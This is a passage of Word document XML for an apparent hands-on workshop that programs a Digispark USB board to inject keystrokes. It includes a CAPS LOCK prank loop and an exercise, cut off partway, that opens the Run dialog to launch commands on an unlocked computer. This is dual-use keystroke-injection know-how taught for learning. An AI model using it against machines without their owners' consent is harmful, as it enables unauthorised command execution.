          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="709"/>
          <w:tab w:val="left" w:pos="0" w:leader="none"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="707" w:hanging="283"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StrongEmphasis"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
        </w:rPr>
        <w:t>You'll see the download progress on the bottom bar of the “Boards Manager” window, when complete it will show “Installed” next to that item on the list.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="709"/>
          <w:tab w:val="left" w:pos="0" w:leader="none"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="707" w:hanging="283"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StrongEmphasis"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
        </w:rPr>
        <w:t>WINDOWS USERS: When complete the install with pop up a Driver Install Wizard window, please click “Next” on this Window to install the drivers for Digistump Boards</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
        </w:rPr>
        <w:t xml:space="preserve"> (If you already have them installed, this installer will update them and install any that are missing)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="709"/>
          <w:tab w:val="left" w:pos="0" w:leader="none"/>
        </w:tabs>
        <w:ind w:left="707" w:hanging="283"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StrongEmphasis"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
        </w:rPr>
        <w:t xml:space="preserve">With the install complete, close the “Boards Manager” window and select the Digispark from the Tools→Boards menu. “Digispark (Default - 16.5mhz)” is the board that should be selected by all new users. </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2597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120130" cy="5259705"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="709"/>
          <w:tab w:val="left" w:pos="0" w:leader="none"/>
        </w:tabs>
        <w:ind w:left="707" w:hanging="283"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StrongEmphasis"/>
        </w:rPr>
        <w:t>The install is now complete!</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> (Linux users see note below)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:id="2" w:name="__RefHeading___Toc1135_152967944"/>
      <w:bookmarkStart w:id="3" w:name="linux_install"/>
      <w:bookmarkEnd w:id="2"/>
      <w:bookmarkEnd w:id="3"/>
      <w:r>
        <w:rPr/>
        <w:t>Linux Install</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="709"/>
          <w:tab w:val="left" w:pos="0" w:leader="none"/>
        </w:tabs>
        <w:ind w:left="707" w:hanging="283"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">If you haven't before - Install the udev rules found here: </w:t>
      </w:r>
      <w:hyperlink r:id="rId10">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="InternetLink"/>
          </w:rPr>
          <w:t>Troubleshooting section</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:id="4" w:name="__RefHeading___Toc155_2153683434"/>
      <w:bookmarkEnd w:id="4"/>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">The IDE </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>The Arduino IDE is split into 3 areas:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5737860" cy="37725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1"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5737860" cy="3772535"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:id="5" w:name="__RefHeading___Toc842_3995523646"/>
      <w:bookmarkEnd w:id="5"/>
      <w:r>
        <w:rPr/>
        <w:t>The toolbar area</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="0" w:right="567" w:hanging="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Used for uploading, compiling, creating a new project, loading and saving. Across the top we have the typical file menus. The buttons below provide shortcuts for the sketch menu option.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="0" w:right="567" w:hanging="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:id="6" w:name="__RefHeading___Toc844_3995523646"/>
      <w:bookmarkEnd w:id="6"/>
      <w:r>
        <w:rPr/>
        <w:t>The Editor Area</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">Used for editing text and adding / selecting files in a project. </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>This is the main area that we will be working in throughout the workshop.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:id="7" w:name="__RefHeading___Toc846_3995523646"/>
      <w:bookmarkEnd w:id="7"/>
      <w:r>
        <w:rPr/>
        <w:t>The Console Area</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:ind w:left="0" w:right="567" w:hanging="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">This provides output when compiling or uploading. This section will also tell us when to plug in the Digispark. </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:id="8" w:name="__RefHeading___Toc169_2153683434"/>
      <w:bookmarkEnd w:id="8"/>
      <w:r>
        <w:rPr/>
        <w:t>Section 2 – The Exercises</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:id="9" w:name="__RefHeading___Toc171_2153683434"/>
      <w:bookmarkEnd w:id="9"/>
      <w:r>
        <w:rPr/>
        <w:t>Exercise 1 – Blinkenlights</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:id="10" w:name="__RefHeading___Toc173_2153683434"/>
      <w:bookmarkEnd w:id="10"/>
      <w:r>
        <w:rPr/>
        <w:t>Aim</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>To test that the digispark is actually working, and provide a gentle introduction to the IDE.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:id="11" w:name="__RefHeading___Toc838_3995523646"/>
      <w:bookmarkEnd w:id="11"/>
      <w:r>
        <w:rPr/>
        <w:t>Method</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:rFonts w:ascii="Liberation Serif" w:hAnsi="Liberation Serif"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>1) Load up the blank template in to the Arduino IDE</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:rFonts w:ascii="Liberation Serif" w:hAnsi="Liberation Serif"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>2) In the setup area, add the following text:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:rFonts w:ascii="Liberation Serif" w:hAnsi="Liberation Serif"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Code"/>
        <w:shd w:fill="A9A9A9" w:val="clear"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:tab/>
        <w:t>pinMode(1, OUTPUT);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Code"/>
        <w:shd w:fill="A9A9A9" w:val="clear"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>DigiKeyboard.delay(5000);</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:rFonts w:ascii="Liberation Serif" w:hAnsi="Liberation Serif"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:rFonts w:ascii="Liberation Serif" w:hAnsi="Liberation Serif"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>3) In the loop area, add the following text:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:rFonts w:ascii="Liberation Serif" w:hAnsi="Liberation Serif"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Code"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>DigiKeyboard.delay(1000);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Code"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>DigiKeyboard.sendKeyStroke(</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>57</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Code"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>digitalWrite(1,HIGH);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Code"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>DigiKeyboard.delay(1000);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Code"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>DigiKeyboard.sendKeyStroke(</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>57</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Code"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>digitalWrite(1,LOW);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">4) </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>In the toolbar area, press the tick button. This compiles the program for the digispark.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">5) Upload the program to the digispark by clicking the arrow button in the toolbar. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">This should be done with the digispark unplugged. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Once clicked, plug the digispark in.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:b/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>After saying “Device is found!” a bunch of orange text should scroll up the screen. If all works well at the bottom you should see the following text:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
        </w:rPr>
        <w:t>&gt; Starting the user app ...</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
        </w:rPr>
        <w:t>running: 100% complete</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:spacing w:before="0" w:after="283"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>&gt;&gt; Micronucleus done. Thank you!</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
        </w:rPr>
        <w:t xml:space="preserve">6) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
        </w:rPr>
        <w:t>Once uploaded, unplug and then replug the digispark.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
          <w:rFonts w:ascii="Liberation Serif" w:hAnsi="Liberation Serif"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
        </w:rPr>
        <w:t xml:space="preserve">7) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
        </w:rPr>
        <w:t>Open up notepad, and hold down the a key. Does it change case?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:id="12" w:name="__RefHeading___Toc840_3995523646"/>
      <w:bookmarkEnd w:id="12"/>
      <w:r>
        <w:rPr/>
        <w:t>So what did we just do?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">The text in the setup area setups up Pin 1 on the digispark in to output mode. </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>This is used to send a signal to an external connection. In this case, it is the LED on the digispark. We then wait for 5 seconds.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>In the Loop area, the program then waits 1 further second. Next, we send a key press (Number 57, the CAPS LOCK key) . At this stage, your keyboard CAPS Lock LED should light up. The next step is to place pin 1. This turns on the LED on the digispark.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>The next three commands are reversing what we have just done, after a fashion. We wait 1 second, the send the CAPS LOCK key again, and then switch off the LED.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">If </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>a</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ll went correctly, Congratulations! You have just uploaded your first working sketch. You are well on the way to annoying other people!</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:id="13" w:name="__RefHeading___Toc175_2153683434"/>
      <w:bookmarkEnd w:id="13"/>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">Exercise 2 – Notepad </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:rFonts w:ascii="Liberation Serif" w:hAnsi="Liberation Serif"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:id="14" w:name="__RefHeading___Toc177_2153683434"/>
      <w:bookmarkEnd w:id="14"/>
      <w:r>
        <w:rPr/>
        <w:t>Aim</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:rFonts w:ascii="Liberation Serif" w:hAnsi="Liberation Serif"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">The aim of this exercise is to run a command from the command line and execute. Once complete, the </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:rFonts w:ascii="Liberation Serif" w:hAnsi="Liberation Serif"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>To start running preset commands on an unlocked computer. This is to introduce the basics of running commands from the command line.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:rFonts w:ascii="Liberation Serif" w:hAnsi="Liberation Serif"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:id="15" w:name="__RefHeading___Toc179_2153683434"/>
      <w:bookmarkEnd w:id="15"/>
      <w:r>
        <w:rPr/>
        <w:t>Method</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:rFonts w:ascii="Liberation Serif" w:hAnsi="Liberation Serif"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>1) Load up the blank template in to the Arduino IDE</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:rFonts w:ascii="Liberation Serif" w:hAnsi="Liberation Serif"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">2) In the setup section </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>type:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:rFonts w:ascii="Liberation Serif" w:hAnsi="Liberation Serif"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Code"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>DigiKeyboard.delay(5000);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Code"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>DigiKeyboard.update();</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:rFonts w:ascii="Liberation Serif" w:hAnsi="Liberation Serif"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:rFonts w:ascii="Liberation Serif" w:hAnsi="Liberation Serif"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>3) In the loop section type:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:rFonts w:ascii="Liberation Serif" w:hAnsi="Liberation Serif"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Code"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>DigiKeyboard.delay(10000);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Code"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>DigiKeyboard.update();</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Code"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>DigiKeyboard.delay(100);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Code"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Code"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>// meta+r, delete content, start notepad</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Code"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
